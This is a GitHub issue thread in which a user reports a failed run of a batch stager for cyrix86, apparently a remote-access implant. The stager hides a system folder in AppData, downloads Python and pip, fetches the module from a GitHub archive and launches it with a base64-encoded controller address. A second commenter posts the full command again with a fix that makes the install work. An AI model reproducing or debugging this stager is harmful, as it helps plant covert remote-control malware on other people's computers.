Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

No module named cyrix86 #4

Open
Blackmercury2eg opened this issue Nov 10, 2024 · 1 comment
Open

No module named cyrix86 #4

Blackmercury2eg opened this issue Nov 10, 2024 · 1 comment

Comments

@Blackmercury2eg
Copy link

Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Mohamed\Documents\cyrix86-build\source>file.bat

C:\Users\Mohamed\Documents\cyrix86-build\source>cd C:\Users\Mohamed\AppData\Roaming & if exist HOqTNIUGcj (cd HOqTNIUGcj & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl ) else (mkdir HOqTNIUGcj & attrib +h +s +r HOqTNIUGcj & cd HOqTNIUGcj & curl -s https://www.python.org/ftp/python/3.12.1/python-3.12.1-embed-win32.zip -o PYTHONZIP & tar -xf PYTHONZIP & echo import site 1>>python312._pth & curl -s https://bootstrap.pypa.io/get-pip.py -O & python get-pip.py & Scripts\pip install https://github.com/madhanmaaz/cyrix86-module/archive/refs/heads/master.zip & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl )
C:\Users\Mohamed\AppData\Roaming\HOqTNIUGcj\python.exe: No module named cyrix86

C:\Users\Mohamed\AppData\Roaming\HOqTNIUGcj>

@gxlydlyf
Copy link

gxlydlyf commented Jan 1, 2025

cd C:\Users\Mohamed\AppData\Roaming & if exist HOqTNIUGcj (cd HOqTNIUGcj & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl ) else (mkdir HOqTNIUGcj & attrib +h +s +r HOqTNIUGcj & cd HOqTNIUGcj & curl -s https://www.python.org/ftp/python/3.12.1/python-3.12.1-embed-win32.zip -o PYTHONZIP & tar -xf PYTHONZIP & echo import site 1>>python312._pth & curl -s https://bootstrap.pypa.io/get-pip.py -O & python get-pip.py & Scripts\\pip install setuptools & Scripts\pip install https://github.com/madhanmaaz/cyrix86-module/archive/refs/heads/master.zip & python -m cyrix86 aHR0cDovL2xvY2FsaG9zdDozNDE1LEZhbHNlLEZhbHNl )

Added 'Scripts\pip install setuptools'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants
@Blackmercury2eg @gxlydlyf and others